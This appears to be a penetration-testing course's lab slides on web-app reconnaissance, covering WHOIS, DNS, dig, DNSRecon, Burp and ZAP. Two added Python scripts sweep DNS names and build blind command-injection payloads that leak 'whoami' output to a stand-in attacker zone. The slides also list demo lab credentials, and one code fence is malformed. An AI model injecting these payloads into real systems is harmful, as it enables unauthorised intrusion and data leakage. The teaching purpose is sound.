ch0 Lab.pptx
Lab Information

Lab Setup
- You will receive one virtual image file: cybrKali.ova
- Download the file to your hard drive
- Use VirtualBox or VMware to import it
- Or use Kali 2

Log In
- Username: student (set as default)
- Password: cybr (case sensitive!)
- Can use sudo for root access (same password)

What Is Included?
- LAMP
  - Kali, 64-bit
  - Apache HTTP Server
  - MySQL (root password: mutillidae)
  - PHP
- Java Runtime Environment (JRE)
- Browser
  - Firefox
  - Chromium Web Browser

What Is Included (Cont.)
- Reconnaissance Tools
  - Whois
  - dig
  - nslookup
  - Nmap (Zenmap)
  - DNSRecon
  - Metasploit
  - Netcat (nc)
  - curl
  - Nikto
  - Wireshark
  - Sqlmap

What Is Included (Cont.)
- Interception proxies
  - Burp Suite (port 8080)
  - OWASP Zed Attack Proxy (ZAP) (port 8082)
  - Fiddler, for Microsoft Windows, not included
- Get between the client and the web application
- Analyze the traffic
- Inject attacks

Targets
- Mutillidae
- Altoro Mutual (http://www.altoromutual.com)
  - Use the following credentials to log in to the Altoro Mutual application: Username: jsmith, Password: Demo1234
  - https://www-01.ibm.com/support/docview.wss?uid=swg21288823
- Zero Bank (http://zero.webappsecurity.com)
  - Login: username / Password: password

WHOIS
- Uses TCP port 43
- Whois lookups are stealthier from a reconnaissance standpoint: the query goes to the Whois servers, not to the target
- Output
  - Name(s) and phone number(s)
  - Physical address
  - DNS servers (names and IP addresses are the most obvious, immediate use for web app pen testing)
  - Public netblocks
- Iterating through Whois/DNS lookups can be quite helpful
- https://whois.icann.org/en/about-whois
- https://www.arin.net/resources/registry/whois/rws/cli/#interpreting-whois-results

Domain Name System (DNS)
- A global hierarchical database of domain names
- Uses UDP port 53 for payloads up to 512 bytes; TCP port 53 for larger responses, notably zone transfers
- Provides a wealth of information and is specifically useful for virtual host discovery
- https://www.iana.org/domains/root/servers
- https://data.iana.org/TLD/tlds-alpha-by-domain.txt

DNS Zone Transfer
- Allows secondary DNS servers to mirror off a primary
- Should not be
  open to the world. Exceptions include:
  - A non-security-minded ISP that manages DNS on behalf of customers
  - Internal DNS servers, which commonly allow zone transfers from any internal netblock
- Two types
  - AXFR, full transfer
  - IXFR, incremental transfer

When Zone Transfers Aren't Available
- Reverse DNS (PTR) scans
  - Many DNS admins create reverse (PTR) records for every A record
  - Perform a whois lookup for IP addresses owned by the target, then perform a reverse DNS lookup for every IP
- DNS "brute force" (dictionary) scans
  - Can discover more names, virtual hosts, CNAMEs
  - Supply a dictionary of potential DNS names
  - Read each entry
  - Attempt to resolve $entry.example.com
  - Quite useful for virtual host discovery
- Always scan with permission if performing large DNS brute force scans!

DNSRecon
- DNSRecon by Carlos Perez (@darkoperator) performs many DNS reconnaissance functions
- Available in /usr/share/dnsrecon in the VM
- Basic usage: dnsrecon -d <domain>
  - Specify the nameserver to query with option -n: dnsrecon -d <domain> -n <nameserver>
- Reverse DNS scans: dnsrecon -r <IP range>
- Includes useful dictionaries (called wordlists) for DNS brute force scans: dnsrecon -D /usr/share/dnsrecon/namelist.txt (1,909 entries)
- https://github.com/darkoperator/dnsrecon

nslookup
- Pros
  - Near-universal availability
  - It is usually installed on compromised hosts, including web servers
  - Useful for confirmation of blind command injection
  - Outbound DNS is often unfiltered
- Cons
  - Limited functionality compared to dig
  - Functionality has been removed from newer versions

dig
- A fully featured DNS client
- Available natively on OS X and most UNIX/Linux distros
- Included in the BIND (Berkeley Internet Name Domain) DNS server package
- $ dig @nameserver example.com options…
  - -t any
  - -t ns
  - -x (reverse lookup of an address)
  - -t axfr
  - dig @nameserver version.bind chaos txt: query the nameserver's version of BIND

Nmap DNS NSE Scripts
- Nmap has a number of DNS-oriented NSE (Nmap Scripting Engine) scripts
- Some replicate functionality available via dig, including dns-zone-transfer.nse
- dns-brute.nse is useful for discovering CNAMEs
- $ ls /usr/share/nmap/scripts/dns*
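The "When Zone Transfers Aren't Available" and DNSRecon slides above describe reverse (PTR) sweeps and dictionary brute force. The following Python script is added here as an illustration; it is not part of the course VM and not dnsrecon's code. It implements both techniques with injectable resolver functions: the socket-based defaults talk to real DNS (use them only against targets you have permission to scan), while the constructed lookup tables (the example.test zone, the 198.51.100.0/27 netblock and the wildcard address are all made up) let the logic run offline. It also adds a check the slides do not mention: a wildcard DNS record makes every dictionary entry resolve, so the script first resolves a random label and discards hits that match that answer.

```python
"""DNS name discovery when a zone transfer is refused: dictionary brute
force of <entry>.<domain> plus a reverse (PTR) sweep of a netblock.
Added example, not from the course VM or from dnsrecon."""
import ipaddress
import random
import socket
import string
from typing import Callable, Dict, Iterable, List, Optional, Tuple

Resolver = Callable[[str], Optional[str]]         # hostname -> IPv4 or None
ReverseResolver = Callable[[str], Optional[str]]  # IPv4 -> hostname or None


def socket_resolver(name: str) -> Optional[str]:
    """Forward lookup with the system resolver (talks to real DNS)."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def socket_reverse_resolver(ip: str) -> Optional[str]:
    """PTR lookup with the system resolver (talks to real DNS)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def wildcard_address(domain: str, resolve: Resolver) -> Optional[str]:
    """Resolve a random label that should not exist. If it resolves, the
    zone has a wildcard record and every dictionary entry will 'hit';
    answers equal to this address are noise, not real hosts."""
    label = "".join(random.choices(string.ascii_lowercase + string.digits, k=16))
    return resolve(f"{label}.{domain}")


def brute_force(domain: str, wordlist: Iterable[str],
                resolve: Resolver = socket_resolver) -> Dict[str, str]:
    """Try to resolve <entry>.<domain> for every dictionary entry.
    Returns {name: address} for real hits, wildcard answers dropped."""
    wildcard = wildcard_address(domain, resolve)
    found: Dict[str, str] = {}
    for entry in wordlist:
        entry = entry.strip().lower()
        if not entry or entry.startswith("#"):   # skip blanks and comments
            continue
        name = f"{entry}.{domain}"
        addr = resolve(name)
        if addr and addr != wildcard:
            found[name] = addr
    return found


def reverse_sweep(netblock: str,
                  reverse: ReverseResolver = socket_reverse_resolver
                  ) -> List[Tuple[str, str]]:
    """PTR lookup for every host address in a CIDR netblock (the netblock
    would normally come from a whois lookup on the target's IPs)."""
    hits: List[Tuple[str, str]] = []
    for ip in ipaddress.ip_network(netblock, strict=False).hosts():
        name = reverse(str(ip))
        if name:
            hits.append((str(ip), name))
    return hits


# Constructed stand-in for the target's DNS so the script runs offline.
# example.test, the 198.51.100.0/27 netblock and the wildcard address are
# made up; the zone deliberately has a wildcard record.
FAKE_FORWARD = {
    "www.example.test": "198.51.100.10",
    "mail.example.test": "198.51.100.20",
    "dev.example.test": "198.51.100.30",
}
FAKE_PTR = {
    "198.51.100.10": "www.example.test",
    "198.51.100.20": "mail.example.test",
    "198.51.100.25": "staging.example.test",  # only findable via PTR
    "198.51.100.30": "dev.example.test",
}
WILDCARD_IP = "198.51.100.99"
WORDLIST = ["www", "mail", "ftp", "dev", "vpn", "# a comment line", ""]


def fake_resolver(name: str) -> Optional[str]:
    if name in FAKE_FORWARD:
        return FAKE_FORWARD[name]
    return WILDCARD_IP if name.endswith(".example.test") else None


def fake_reverse(ip: str) -> Optional[str]:
    return FAKE_PTR.get(ip)


def demo() -> Tuple[Dict[str, str], List[Tuple[str, str]]]:
    """Run both techniques against the constructed zone."""
    names = brute_force("example.test", WORDLIST, fake_resolver)
    ptrs = reverse_sweep("198.51.100.0/27", fake_reverse)
    return names, ptrs


if __name__ == "__main__":
    names, ptrs = demo()
    for name, addr in names.items():
        print(f"A    {name} -> {addr}")
    for addr, name in ptrs:
        print(f"PTR  {addr} -> {name}")
```

Against the constructed zone, ftp and vpn resolve only to the wildcard address and are dropped, while staging.example.test, which is in no wordlist, is found by the PTR sweep; that is exactly why the slides recommend running both methods.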
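The nslookup slide notes that it is usually present on a compromised web server, that outbound DNS is often unfiltered, and that it can confirm blind command injection. The following Python is added here as an illustration and is not taken from the course. It shows the two halves of that technique: building injection payloads that make the target resolve a unique canary name under a zone the tester controls, and spotting that lookup in the authoritative server's query log. The zone name dns.attacker.test, the BIND-style query log format and the log lines themselves are constructed for the example.

```python
"""Confirming blind OS command injection with an outbound nslookup.
Added example, not from the course material. The tester runs (or can read
the query log of) the authoritative server for CANARY_ZONE; the injected
nslookup makes the target resolve a unique label under that zone, which
is visible there even when the application itself returns nothing."""
import re
import secrets
from typing import List, Optional, Tuple

CANARY_ZONE = "dns.attacker.test"   # assumed tester-controlled zone


def new_canary() -> str:
    """Unique label so a hit in the log can be tied to this test."""
    return secrets.token_hex(6)


def injection_payloads(canary: str, zone: str = CANARY_ZONE) -> List[str]:
    """Payloads for a parameter that reaches a shell. nslookup is chosen
    because it is present on nearly every host and outbound DNS is rarely
    filtered; the $(whoami) variant leaks a value in the query name."""
    host = f"{canary}.{zone}"
    return [
        f"; nslookup {host}",
        f"| nslookup {host}",
        f"`nslookup {host}`",
        f"; nslookup $(whoami).{host}",
    ]


# Assumed BIND-style querylog line:
#   "... client [@0x...] <ip>#<port> (<name>): query: <name> IN A ..."
LOG_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[\d.]+)#\d+ .*?query: (?P<qname>\S+) IN "
)


def canary_hits(log_lines: List[str], canary: str,
                zone: str = CANARY_ZONE) -> List[Tuple[str, str, Optional[str]]]:
    """Return (source ip, queried name, leaked label or None) for every
    log entry whose query name is <canary>.<zone> or a label under it."""
    suffix = f"{canary}.{zone}".lower()
    hits: List[Tuple[str, str, Optional[str]]] = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if qname == suffix:
            hits.append((m.group("src"), qname, None))
        elif qname.endswith("." + suffix):
            hits.append((m.group("src"), qname, qname[: -len(suffix) - 1]))
    return hits


# Constructed log lines (not real traffic): two queries triggered by the
# injected payloads from 203.0.113.7, one unrelated query, one non-query line.
SAMPLE_CANARY = "ab12cd34ef56"
SAMPLE_LOG = [
    "12-Mar-2024 10:01:02.123 queries: info: client @0x7f3c2a1b2c30 203.0.113.7#51234 "
    "(ab12cd34ef56.dns.attacker.test): query: ab12cd34ef56.dns.attacker.test IN A +E(0)K (198.51.100.2)",
    "12-Mar-2024 10:01:09.457 queries: info: client @0x7f3c2a1b2c30 203.0.113.7#51240 "
    "(www-data.ab12cd34ef56.dns.attacker.test): query: www-data.ab12cd34ef56.dns.attacker.test IN A +E(0)K (198.51.100.2)",
    "12-Mar-2024 10:02:30.001 queries: info: client @0x7f3c2a1b2c30 198.51.100.50#40000 "
    "(other.dns.attacker.test): query: other.dns.attacker.test IN A + (198.51.100.2)",
    "12-Mar-2024 10:02:31.000 general: info: zone dns.attacker.test/IN: loaded serial 2024031201",
]


if __name__ == "__main__":
    for p in injection_payloads(SAMPLE_CANARY):
        print("payload:", p)
    for src, qname, leaked in canary_hits(SAMPLE_LOG, SAMPLE_CANARY):
        print(f"hit from {src}: {qname}" + (f" (leaked: {leaked})" if leaked else ""))
</ ```

Use a fresh canary per injection point so a hit in the log identifies which parameter was vulnerable; the source address in the log is the target's egress resolver, not necessarily the web server itself.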
Metasploit
- Most popular exploitation framework
- Commonly associated with network and general exploitation
- Includes significant web testing capabilities, especially for testing off-the-shelf rather than custom software
- Numerous relevant exploits for WordPress, Joomla, Drupal, Oracle DB, SQL Server, and many others
- Has useful DNS information-gathering modules under /opt/metasploit-framework/embedded/framework/modules/post/multi/gather/
  - dns_bruteforce
  - dns_reverse_lookup
  - dns_srv_lookup

Burp Suite
- Uses default port number 8080
- Proxy -> Options, where the port can be changed
- Two community versions installed
  - Older version is a desktop shortcut; it can scan
  - Later version is in Favorites, without the scan function

OWASP Zed Attack Proxy (ZAP)
- Full-featured open source interception proxy
- Desktop shortcut, Favorites, or run at the CLI: zap.sh
- Set port number: Tools -> Options -> Local Proxies -> Port (set to 8082)
- ZAP's CA certificate is set up in Firefox
- OWASP ZAP Desktop User Guide: https://www.zaproxy.org/docs/desktop/